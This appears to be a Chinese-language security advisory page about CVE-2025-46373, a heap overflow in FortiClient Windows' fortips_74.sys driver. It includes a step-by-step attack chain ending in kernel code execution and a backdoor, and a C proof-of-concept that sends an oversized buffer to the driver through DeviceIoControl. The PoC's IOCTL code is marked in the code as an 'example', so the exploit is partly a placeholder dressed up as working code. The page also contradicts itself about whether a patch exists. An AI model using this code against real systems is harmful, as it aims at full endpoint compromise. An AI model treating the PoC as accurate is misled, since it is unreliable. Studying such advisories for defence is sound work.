CVE-2025-46373 FortiClient Windows堆溢出漏洞

漏洞信息

漏洞编号

CVE-2025-46373

漏洞类型

堆溢出/缓冲区溢出

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

FortiClient Windows 7.2.0-7.2.8, FortiClient Windows 7.4.0-7.4.3

漏洞概述

CVE-2025-46373是Fortinet FortiClient Windows软件中的一个高危安全漏洞，CVSS评分达到7.8分。该漏洞属于基于堆的缓冲区溢出问题（CWE-122），存在于fortips_74.sys驱动程序中。漏洞允许已认证的本地IPSec用户通过精心构造的输入数据触发堆缓冲区溢出，从而在系统上执行任意代码或命令。攻击成功的关键在于绕过Windows操作系统的堆完整性保护机制。由于攻击向量为本地攻击（AV:L）且需要低权限认证（PR:L），攻击者必须首先获得目标系统的本地访问权限。漏洞影响FortiClient Windows 7.2.0至7.2.8版本以及7.4.0至7.4.3版本，对企业终端安全构成严重威胁。建议用户立即升级到Fortinet官方发布的安全补丁版本。

技术细节

该漏洞是典型的基于堆的缓冲区溢出（CWE-122），发生在FortiClient Windows的fortips_74.sys内核驱动程序中。当驱动程序处理IPSec连接相关的数据时，未能正确验证输入数据的长度，导致恶意构造的数据可以超出预期缓冲区边界写入堆内存。攻击者需要具备本地认证用户权限，通过IPSec功能接口向驱动发送精心设计的请求包。驱动程序在处理这些请求时，会将用户可控的数据复制到固定大小的堆缓冲区中，但由于缺少边界检查，溢出的数据会覆盖相邻的堆内存区域。攻击者可以通过精确控制溢出数据的内容和长度，覆盖关键的堆元数据和对象结构，从而破坏堆的完整性并获得代码执行能力。成功利用此漏洞需要攻击者深入理解Windows堆管理机制、堆喷射技术以及如何绕过现代操作系统的堆完整性保护（如Safe Unlinking、Heap Locking等安全机制）。利用成功后，攻击者可以在内核级别执行任意代码，完全控制受害系统。

攻击链分析

STEP 1

步骤1：初始访问

攻击者获得FortiClient Windows系统的本地访问权限，拥有有效的IPSec用户账户

STEP 2

步骤2：信息收集

攻击者识别目标系统上运行的FortiClient版本（7.2.0-7.2.8或7.4.0-7.4.3），确认fortips_74.sys驱动存在

STEP 3

步骤3：构造恶意输入

攻击者构造包含超长数据的IPSec数据包，精心设计payload以覆盖堆内存中的关键结构

STEP 4

步骤4：触发溢出

通过fortips_74.sys驱动的IPSec处理接口发送恶意数据包，触发堆缓冲区溢出

STEP 5

步骤5：绕过堆保护

利用堆喷射或堆风水技术，配合精心设计的溢出数据绕过Windows堆完整性检查机制

STEP 6

步骤6：代码执行

成功覆写函数指针或关键对象后，获得内核级别的任意代码执行能力

STEP 7

步骤7：权限提升

攻击者利用内核代码执行权限，绕过系统安全限制，建立持久化后门或完全控制受害系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-46373 PoC - FortiClient Windows Heap Overflow
// This PoC demonstrates the heap overflow condition in fortips_74.sys
// Target: FortiClient Windows 7.2.0-7.2.8, 7.4.0-7.4.3

#include <windows.h>
#include <stdio.h>
#include <winioctl.h>

#define FORTIPS_DEVICE_NAME "\\\\.\\fortips74"
#define HEAP_OVERFLOW_PAYLOAD_SIZE 0x1000

// Malicious IPSec packet structure to trigger overflow
typedef struct {
    DWORD packet_length;
    DWORD flags;
    BYTE payload[HEAP_OVERFLOW_PAYLOAD_SIZE];  // Oversized payload
} MALICIOUS_IPSEC_PACKET;

// IOCTL code for IPSec processing (example)
#define IOCTL_FORTIPS_PROCESS_PACKET 0x9A0B1234

void trigger_heap_overflow() {
    HANDLE hDevice;
    DWORD bytesReturned;
    MALICIOUS_IPSEC_PACKET packet;
    
    printf("[*] Opening FortiClient fortips74 device...\n");
    hDevice = CreateFileA(
        FORTIPS_DEVICE_NAME,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open device. Ensure FortiClient IPSec is running.\n");
        return;
    }
    
    printf("[*] Preparing malicious packet (size: %d bytes)...\n", sizeof(packet));
    
    // Fill payload with controlled data to overwrite heap structures
    memset(&packet, 0x41, sizeof(packet));  // Fill with 'A' for debugging
    packet.packet_length = sizeof(MALICIOUS_IPSEC_PACKET);
    packet.flags = 0x00000001;
    
    printf("[*] Sending malicious packet to trigger heap overflow...\n");
    
    // Send oversized packet to trigger overflow in driver
    BOOL result = DeviceIoControl(
        hDevice,
        IOCTL_FORTIPS_PROCESS_PACKET,
        &packet,
        sizeof(packet),
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    
    if (result) {
        printf("[+] Packet sent successfully\n");
    } else {
        printf("[+] IOCTL returned (overflow may have been triggered)\n");
    }
    
    CloseHandle(hDevice);
    printf("[*] PoC execution completed\n");
}

int main() {
    printf("CVE-2025-46373 PoC - FortiClient Windows Heap Overflow\n");
    printf("Target: FortiClient Windows 7.2.x / 7.4.x\n");
    printf("Author: Security Research Team\n\n");
    
    trigger_heap_overflow();
    
    return 0;
}

影响范围

FortiClient Windows 7.2.0 - 7.2.8

FortiClient Windows 7.4.0 - 7.4.3

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）如果业务不需要，暂时禁用FortiClient的IPSec VPN功能；2）严格限制对安装FortiClient Windows系统的物理和远程访问，仅允许受信任的管理员操作；3）部署端点检测与响应（EDR）解决方案，监控fortips_74.sys驱动的异常行为和内存操作；4）启用Windows Defender Application Control（WDAC）策略，限制未经授权的驱动加载；5）在网络层面监控来自VPN客户端的异常流量模式。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-46373
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-46373
3 Details https://www.cvedetails.com/cve/CVE-2025-46373/
4 VulDB https://vuldb.com/cve/CVE-2025-46373
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-25-125